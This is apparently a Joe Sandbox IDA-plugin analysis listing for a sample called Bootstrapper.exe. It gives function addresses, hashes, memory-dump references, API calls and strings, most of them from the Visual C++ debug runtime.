Opcode ID: 556265f884e4de0f315e6bc78bfb51e9724556ae7c02ca3d1518935b8a392b45
Instruction ID: 917ff97cb91eaabee2797607f79106d06d7a9bef14283dd47e2076fd9bedfbc7
Opcode Fuzzy Hash: 556265f884e4de0f315e6bc78bfb51e9724556ae7c02ca3d1518935b8a392b45
Instruction Fuzzy Hash: 00030175E00259CFCB54CFA9E890AECBBF1FB58311B14826AE858EB351E7389941CF54

Function 007F51D0 Relevance: 2.8, Strings: 2, Instructions: 294COMMON

Download Yara Rule

Strings

[Y, xrefs: 007F5338
[Y, xrefs: 007F534D

Memory Dump Source

Source File: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID: [Y$[Y
API String ID: 0-2744515570
Opcode ID: 44ecf7cbd7d882a00a1ff31c3a22c1fd53be6186d4e77e501627276bb46e1d7a
Instruction ID: a774b6bb11e86cc7d4064af91c648d126f34213933a2b2d5eb01e055db051a18
Opcode Fuzzy Hash: 44ecf7cbd7d882a00a1ff31c3a22c1fd53be6186d4e77e501627276bb46e1d7a
Instruction Fuzzy Hash: B9B16172A08BC58FC715CA7CC8456BEBFA16F57220B1D839CD6A59B3D2C6294806C761

Function 00785650 Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?,D8E815C3), ref: 007856A6

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 0a2fa6abce9b7ae8867a72a56779afe2af970b4874beeaf2d244dc41a37f45f7
Instruction ID: 702dc0ff86b4ebfde15eb20cdc57fc34c121c4b522bbd3c75662cc1a476ab75a
Opcode Fuzzy Hash: 0a2fa6abce9b7ae8867a72a56779afe2af970b4874beeaf2d244dc41a37f45f7
Instruction Fuzzy Hash: 0B319E75D45658DFCF14CFA8C880AEEBBB5BB49310F20826AD419A7250E7396941CB64

Function 007F9470 Relevance: 1.5, Strings: 1, Instructions: 234COMMON

Download Yara Rule

Strings

TWVI, xrefs: 007F9605

Memory Dump Source

Source File: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID: TWVI
API String ID: 0-4013521978
Opcode ID: 47e6841103e724b16697dd6627fc2db25552b24e02dea986c2b3eeed16aa7ae9
Instruction ID: 1d959e9678917edf7a0aa032a71ef81800dbd4e15368511eb0c3a57e64be3bde
Opcode Fuzzy Hash: 47e6841103e724b16697dd6627fc2db25552b24e02dea986c2b3eeed16aa7ae9
Instruction Fuzzy Hash: 15612632A042145BDB209F28C8C077BB792ABD9724F19857DDBD89B391E7398C42CBC1

Function 007C1040 Relevance: .7, Instructions: 714COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a89511a2babab4854ca0d321ff468ea6fad8389695e18cdf6cd13c96795c7cbd
Instruction ID: 49deb869c17c65fcac310db2eeaafa9d50e661e6119c48f72155ffc506073e9d
Opcode Fuzzy Hash: a89511a2babab4854ca0d321ff468ea6fad8389695e18cdf6cd13c96795c7cbd
Instruction Fuzzy Hash: DC52B3316083458FCB14CF28C090BAABBE1BF86314F998A7DE8D957342D779E945CB85

Function 007C5570 Relevance: .6, Instructions: 613COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 309dc27259ee14ec91676eaac6efe7ad7bceeedbc01e2f1bc8baeb2b0c82d24f
Instruction ID: 92e3c6fef9b588879d9a030dcd764802364261bfcf77061f76917bd9a10069d3
Opcode Fuzzy Hash: 309dc27259ee14ec91676eaac6efe7ad7bceeedbc01e2f1bc8baeb2b0c82d24f
Instruction Fuzzy Hash: D412B432608B118BC734DF18D880BABB3E2FFD4315F598A2DD5C697241D779B8958B81

Function 007C4300 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0df0a02bacb4f98860999bf3be8079696e2c0c4e7ea2eb099f5fae698be4eaf8
Instruction ID: a188d04d7d64b2d454bf82f53dade2010f3f2f34f17a32db098d94eded83b5aa
Opcode Fuzzy Hash: 0df0a02bacb4f98860999bf3be8079696e2c0c4e7ea2eb099f5fae698be4eaf8
Instruction Fuzzy Hash: 3AC159B2A587418FC360CF28DC96BABB7F1BF85318F08492DD1D9C6242E778A155CB46

Function 007DC4E0 Relevance: .2, Instructions: 228COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d0c1970e8c814da268cfb7a6fe5cf92124f194da7cb2e521d7c822092c66475
Instruction ID: 34acd5448150d5359e29282d332a08454151c70c339e366391cd20939782f631
Opcode Fuzzy Hash: 9d0c1970e8c814da268cfb7a6fe5cf92124f194da7cb2e521d7c822092c66475
Instruction Fuzzy Hash: 536126377599824BE729893C5C112A67A934BD3334B3DC77BE5B2CB3E5E9688C428340

Function 0077F060 Relevance: 61.7, APIs: 31, Strings: 4, Instructions: 422COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 0077F0FE
___vcrt_getptd.LIBVCRUNTIMED ref: 0077F10E
___vcrt_getptd.LIBVCRUNTIMED ref: 0077F119
___vcrt_getptd.LIBVCRUNTIMED ref: 0077F176
___vcrt_getptd.LIBVCRUNTIMED ref: 0077F181
___vcrt_getptd.LIBVCRUNTIMED ref: 0077F18C
Is_bad_exception_allowed.LIBVCRUNTIMED ref: 0077F1B5

Part of subcall function 00780300: type_info::operator==.LIBVCRUNTIMED ref: 0078033D

___DestructExceptionObject.LIBCMTD ref: 0077F1CA
std::bad_alloc::bad_alloc.LIBCMTD ref: 0077F1D8

Part of subcall function 0077FA20: std::exception::exception.LIBCMTD ref: 0077FA31

Part of subcall function 00780790: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,00000000), ref: 0078082A

_Smanip.LIBCPMTD ref: 0077F1FE
__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 0077F288
weak_ptr.LIBCPMTD ref: 0077F2DF
__FrameHandler3::HandlerMap::end.LIBVCRUNTIMED ref: 0077F2EB
__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 0077F2F5
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 0077F301
CatchIt.LIBCMTD ref: 0077F3AB

Strings

csm, xrefs: 0077F0B0
C, xrefs: 0077F487
csm, xrefs: 0077F131
csm, xrefs: 0077F206

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: ___vcrt_getptd$FrameHandlerHandler3::$ExceptionMap::iterator::operator++$Affinity::operator!=CatchConcurrency::details::DestructHardwareIs_bad_exception_allowedMap::endObjectRaiseSmanipstd::bad_alloc::bad_allocstd::exception::exceptiontype_info::operator==weak_ptr
String ID: csm$csm$csm$C
API String ID: 2995349249-3954603546
Opcode ID: 15e81cebda25780b0dcb7a2e6b00052036e41fb8d11c8005c36ed7f2f045178c
Instruction ID: b9384c74b00b59698c5ea5ad9f1e1b2c494d9a0976b35ac03a942a16ae2480b0
Opcode Fuzzy Hash: 15e81cebda25780b0dcb7a2e6b00052036e41fb8d11c8005c36ed7f2f045178c
Instruction Fuzzy Hash: 00F170B5900209DBCF18EFA4C9859AF77B5BF54384F50C128F9199B242DB38EA45CBE1

Function 00791310 Relevance: 33.6, APIs: 7, Strings: 12, Instructions: 302COMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000006,?,00000000), ref: 00791350
__invoke_watson_if_error.LIBCMTD ref: 007913F3

Strings

xz, xrefs: 00791554
_CrtDbgReport: String too long or IO Error, xrefs: 00791769
common_message_window, xrefs: 007913CB, 0079171F, 0079175F
Microsoft Visual C++ Runtime Library, xrefs: 00791790
z, xrefs: 0079161F
wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error"), xrefs: 00791764
minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp, xrefs: 007913C6, 0079171A, 0079175A
%{, xrefs: 0079163B
@, xrefs: 0079141C
@, xrefs: 007914B0
(*_errno()), xrefs: 00791724
traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character())), xrefs: 007913D0

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: HandleModule__invoke_watson_if_error
String ID: (*_errno())$@$@$Microsoft Visual C++ Runtime Library$_CrtDbgReport: String too long or IO Error$common_message_window$minkernel\crts\ucrt\src\appcrt\misc\dbgrpt.cpp$traits::tcscpy_s(program_name, (sizeof(*__countof_helper(program_name)) + 0), get_program_name_unknown_text(Character()))$wcscpy_s(message_buffer, 4096, L"_CrtDbgReport: String too long or IO Error")$xz$%{$z
API String ID: 3976807648-2747226696
Opcode ID: f5edff6f9fce220f37477a23c133c2da9e12f927312cfa2d166f1b18e7c723ed
Instruction ID: f9a58a22bab91ffce0f7c3eaacaff9e7e455aae6f9798ec7aa7757ceab1ee889
Opcode Fuzzy Hash: f5edff6f9fce220f37477a23c133c2da9e12f927312cfa2d166f1b18e7c723ed
Instruction Fuzzy Hash: 4CD19DB0D0022ADBDF24DF10EC4DBDA77B1ABA9304F4141E9E60966281D7789EE5CF91

Function 0079C150 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 233COMMON

Download Yara Rule

APIs

__aligned_msize.LIBCMTD ref: 0079C2EF
__invoke_watson_if_error.LIBCMTD ref: 0079C30E

Strings

fp_format_e_internal, xrefs: 0079C1DF, 0079C303
e+000, xrefs: 0079C2E2
%ls, xrefs: 0079C199
strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), ", xrefs: 0079C308
minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp, xrefs: 0079C1A2, 0079C1DA, 0079C2FE
result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1), xrefs: 0079C194, 0079C1E4
d, xrefs: 0079C36D

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: __aligned_msize__invoke_watson_if_error
String ID: %ls$d$e+000$fp_format_e_internal$minkernel\crts\ucrt\src\appcrt\convert\cvt.cpp$result_buffer_count > static_cast<size_t>(3 + (precision > 0 ? precision : 0) + 5 + 1)$strcpy_s( p, result_buffer_count == (static_cast<size_t>(-1)) ? result_buffer_count : result_buffer_count - (p - result_buffer), "
API String ID: 4254006664-2583523412
Opcode ID: 44dd291077e40a019cae99c8fdfc7e349ed7dd42699d282a13b98106add5a819
Instruction ID: 33fdb8d199439be89fc899bf5096fc2d9516a9a22df590f6a217e401676b8856
Opcode Fuzzy Hash: 44dd291077e40a019cae99c8fdfc7e349ed7dd42699d282a13b98106add5a819
Instruction Fuzzy Hash: 1BA130B0E04248EFCF05CF98D995BADBBB1BF49304F248199E4156B382C778AE40DB55

Function 007A45B0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 281COMMON

Download Yara Rule

Strings

minkernel\crts\ucrt\src\appcrt\convert\mbstowcs.cpp, xrefs: 007A4635, 007A466D
Cz, xrefs: 007A4839, 007A47CD, 007A47DB, 007A47AF, 007A47F9, 007A482B
_mbstowcs_l_helper, xrefs: 007A4672
Cz, xrefs: 007A468C, 007A48E3, 007A486E, 007A4804, 007A477C, 007A46AD, 007A4650, 007A4665, 007A4668, 007A46B0
%ls, xrefs: 007A462C
s != nullptr, xrefs: 007A4627, 007A4677

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID: %ls$_mbstowcs_l_helper$minkernel\crts\ucrt\src\appcrt\convert\mbstowcs.cpp$s != nullptr$Cz$Cz
API String ID: 0-2783138576
Opcode ID: c552fa18fe2bca4f3e329bd1aacea3d8cadf79371d7cc6505cd96c21ef133b15
Instruction ID: bd70d100253f50024a0b8c433b9fa4986c9e3ca88aede30b2c3359e40f9c9f5c
Opcode Fuzzy Hash: c552fa18fe2bca4f3e329bd1aacea3d8cadf79371d7cc6505cd96c21ef133b15
Instruction Fuzzy Hash: ACB17C70A00209DFDB14DFA8D885BBE77B1FFC6314F208619E925AB281D7B9AD41CB51

Function 00781080 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 210COMMON

Download Yara Rule

Strings

minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp, xrefs: 007810ED, 0078111A
%ls, xrefs: 007810E1
mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments, xrefs: 007810DC, 00781124
common_configure_argv, xrefs: 0078111F
C:\Users\user\Desktop\Bootstrapper.exe, xrefs: 00781157, 00781170, 007811B3

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID: %ls$C:\Users\user\Desktop\Bootstrapper.exe$common_configure_argv$minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp$mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments
API String ID: 0-946240980
Opcode ID: 5d319b214ed45446aaef1b58aec48f212514931cb27c4a1c8c528076c162c00a
Instruction ID: 4f04517d8d7eaa302c6a704181a86248f1848fc68b4cdf3f07e8e376628916a4
Opcode Fuzzy Hash: 5d319b214ed45446aaef1b58aec48f212514931cb27c4a1c8c528076c162c00a
Instruction Fuzzy Hash: D9816EB1D40208DBDB04FFD4DC5ABEEB7B8BF54304F904529E505AB281EB786946CBA1

Function 0077F580 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 0077F597
___vcrt_getptd.LIBVCRUNTIMED ref: 0077F5A2

Strings

RCC, xrefs: 0077F5C6
MOC, xrefs: 0077F5BB

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: ___vcrt_getptd
String ID: MOC$RCC
API String ID: 984050374-2084237596
Opcode ID: b6bea7ed29d0944c9f5526d8bc182a41f4efdf1a574837bf14cd72f97268691d
Instruction ID: 9a2039e50da1ee5e0958e63f3e46c2123a70e539f6145f2701a2018f4441c7d7
Opcode Fuzzy Hash: b6bea7ed29d0944c9f5526d8bc182a41f4efdf1a574837bf14cd72f97268691d
Instruction Fuzzy Hash: B5515271A00109EBCF04DF98DA85EEE73B9AF48340F14C169F909A7291D738ED51CBA1

Function 0079B480 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

HeapSize.KERNEL32(?,00000000,00000000), ref: 0079B524
HeapReAlloc.KERNEL32(?,00000010,00000000,?), ref: 0079B559

Strings

_expand_base, xrefs: 0079B4E7
minkernel\crts\ucrt\src\appcrt\heap\expand.cpp, xrefs: 0079B4B8, 0079B4E2
block != nullptr, xrefs: 0079B4AA, 0079B4EC
%ls, xrefs: 0079B4AF

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: Heap$AllocSize
String ID: %ls$_expand_base$block != nullptr$minkernel\crts\ucrt\src\appcrt\heap\expand.cpp
API String ID: 3906553864-3244948836
Opcode ID: ee038855baaf2f4d189f27c513afd0c02f7934fb1afd0b390c2838ca67b22b34
Instruction ID: 0dfcf746fc03053c67ad346f8cad3e1504e3e09b346d84c9effda5c1d42982f4
Opcode Fuzzy Hash: ee038855baaf2f4d189f27c513afd0c02f7934fb1afd0b390c2838ca67b22b34
Instruction Fuzzy Hash: 1F3160B0E0020CEFDF14DFA0F94ABAE77B0AB44704F118554F515AB281D7BC9A51CBA5

Function 00780670 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 82COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 007806DB
__aligned_msize.LIBCMTD ref: 00780736
__crt_unique_heap_ptr.LIBCMTD ref: 00780741

Part of subcall function 00780620: __crt_unique_heap_ptr.LIBCMTD ref: 0078062A

Strings

%ls, xrefs: 0078068E
D:\a\_work\1\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp, xrefs: 00780697
to->_What == nullptr && to->_DoFree == false, xrefs: 00780689

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: __crt_unique_heap_ptr$__aligned_msize_strlen
String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\eh\std_exception.cpp$to->_What == nullptr && to->_DoFree == false
API String ID: 3817959681-3183830673
Opcode ID: 264adf660e38078786126f56855454abd55ec493fb4817edcf7cc2474cc7c6d7
Instruction ID: b7bd5d10f6dcfb04275c4ee15d3a3b31b0deb9c0e15655adcd672af749655845
Opcode Fuzzy Hash: 264adf660e38078786126f56855454abd55ec493fb4817edcf7cc2474cc7c6d7
Instruction Fuzzy Hash: C8318D74A40208EFCB14EF54C856BADB772AF95300F14C098E8199B382EB39EE14CB91

Function 007A7490 Relevance: 9.2, APIs: 6, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0791a319c8ef3544381031ce7b32cdd0174f4347c69ffdcbc629afc9e6202d1e
Instruction ID: a46c95ed6de5fb936b0dfcd919ce24057c5569b128865cea6010b93d0fd4cd73
Opcode Fuzzy Hash: 0791a319c8ef3544381031ce7b32cdd0174f4347c69ffdcbc629afc9e6202d1e
Instruction Fuzzy Hash: B161D471C04B08DACF11EF78D90626EBBB4BFD7745F10C769EA882A141EB388994D752

Function 007974C0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79timeCOMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00781D3A,?,00781A1D,?,?,?,?,?,00781F1A), ref: 007974C8
std::_Timevec::_Timevec.LIBCPMTD ref: 007974D2
__wcstombs_l.LIBCMTD ref: 00797531
std::_Timevec::_Timevec.LIBCPMTD ref: 0079753D

Strings

minkernel\crts\ucrt\src\desktopcrt\env\get_environment_from_os.cpp, xrefs: 00797524

Memory Dump Source

Source File: 00000000.00000002.2550113315.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true

Associated: 00000000.00000002.2550091005.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550166057.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550187030.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550205616.00000000007BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2550242649.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_720000_Bootstrapper.jbxd

Similarity

API ID: TimevecTimevec::_std::_$EnvironmentStrings__wcstombs_l
